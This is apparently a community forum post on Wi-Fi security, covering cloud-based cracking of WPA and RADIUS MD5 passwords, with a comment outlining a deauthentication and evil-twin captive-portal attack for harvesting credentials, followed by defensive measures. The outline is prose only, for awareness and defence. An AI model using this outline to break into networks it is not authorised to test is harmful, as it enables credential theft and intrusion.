cancel
Showing results for 
Search instead for 
Did you mean: 
Create Post

Are Wireless Access Points a Threat to Your Network Security?

Level 13

In a previous post I explained that AES is the encryption technology that provides the best chance of keeping your data  secure and private. Even the United States' departments of intelligence use AES (with 192 or 256 bit key lengths) to encrypt ‘top secret’ digital information.

I want to follow-up here with a caveat on security for WiFi networks. In this case, instead of the security of transferred data, our focus is on gaining access to a wireless network despite password protection.

Brute-forcing Passwords

At the international Black Hat conference in 2011, German researcher Thomas Roth made available his software for cracking passwords on WPA-protected wireless networks. The software itself is of less interest than the fact Roth leveraged Amazon’s cloud computing service for 20 minutes at an estimated total cost of $5.40 to perform the crack.

You may say that enterprise wireless networks do not depend on WPA or WPA2 for their security and so are immune to such attacks; the threat is limited to home networks build around a wireless router.

Standard practice for enterprise wireless network setup is to use a network access server (NAS) with a RADIUS server as the authentication and authorization points for granting access to the network. This is where the other shoe drops with Roth’s software; massive cloud-computing power also makes it capable of cracking the MD5-hashed passwords used in the communication between the NAS and the RADIUS server.

Besides the usual lock-out rules on the access servers for attempts that exceed a threshold, you should also consider monitoring your access points to catch the patterns that imply persisting strategies to infiltrate your wireless network through brute-forcing.

pastedImage_0.png

2 Comments
Level 15

Interesting.

Level 12

Mixed feelings on this topic. Now if you are using pre-shared keys and simply hiding your SSID to secure your wireless network, and filtering based on MAC. You are not secure, but rather making life harder on yourself and your users. Instead look at options to use captive portals, certificates, and radius authentication. It is a little extra setup time, but well worth the time spent.

DISCLAIMER: THE BELOW OUTLINE EXPLAINS HOW A WIRELESS ATTACK MAY BE CARRIED OUT FOR SECURITY AWARENESS, YOU SHOULD NEVER ATTEMPT TO BREAK INTO ANOTHER WIRELESS NETWORK WITHOUT WRITTEN PERMISSION FROM THE NETWORK OWNER.

Why hiding the SSID does not work, and never did: Access points are only one side of the beacon request, clients are louder and this is where WiFi has the largest flaw. Once a client has connected, the next time it disconnects it will broadcast even SSID it has ever connected to in an effort to find the next WAP. There are a number of reasons a client may get disconnected, if even for a split second. This includes weak signals, interference from other radio gear and wireless operating on the same channel and frequency, and wireless deauth attacks.


How to get clients to tell me the magic word: Wireless Deauthentication attacks are used to trick both the access point and the client that they are disconnected. Why is this possible? It is a basic part of the protocol, and basically a packet is sent to the WAP and CLient at the same time saying to the other I'm disconnecting from you. After which the client sends out its requests to reconnect which contain the SSID.


So what you have the SSID what can you do with it: Actually there are a number of things you can do and while WPA2 enterprise does limit the attack vector, there is still one thing that can work. Users are busy, they get frustrated, and they don't always read every popup on their screen. Social engineering, or the art of getting someone to do something they normally would not is lie and well in the wireless world. Simply setup an accesspoint give it the same SSID and some internet to reward the user with once they connect, and use a captive portal to collect usernames and passwords. A captive portal is just a simple webpage that users see when they connect. Many devices complain briefly that the security is different with the fake SSID, but more users don't bother to read the warning and just click through. At this point you probably have enough information to connect to the wireless network directly, or simply place your access point as a "Man in the Middle" device.

---- So how to prevent this type of attack? ---

- Wireless Intrusion Detection is a method, think IDS/IPS for wireless (not all solutions are equal)

- User education (help them to )

- Testing devices to make sure they don't connect to unsecured APs automatically

- Wireless Geo-location, being able to know where users are based on the APs that can see the user (not always very good)

- I'm open to suggestions.

Also I recommend you try wireless hacking , your own networks or lab wireless networks. You'll find tools $99 to free or even more than $1,000. It is money well spent and give you first hand experience in how easy it is to break into a wireless network, or even just attacking the end wireless user so you can design the correct controls.  AGAIN ONLY ATTACK NETWORKS YOU OWN (stay out of legal trouble), and probably make sure you don't do so during Netflix prime time at home either to keep your family happy (or every time the network goes down you will get questioned if your hacking the wireless again).

About the Author
If I were a HAL 9000 series computing machine I might be in an operational state on a space vessel somewhere in our little solar system, closer to Jupiter than Earth, with some probability of lethal malfunction; and to understate the obvious, I would not be helping anyone here on thwack.com. But I do or try to help people on thwack.com watch their bits better. Therefore, I am probably not a HAL 9000 series computing machine. I alternate between feeling ambiguously clear (state='0' if you like) and clearly ambiguous (state='1' as it were). I enjoy verbing nouns.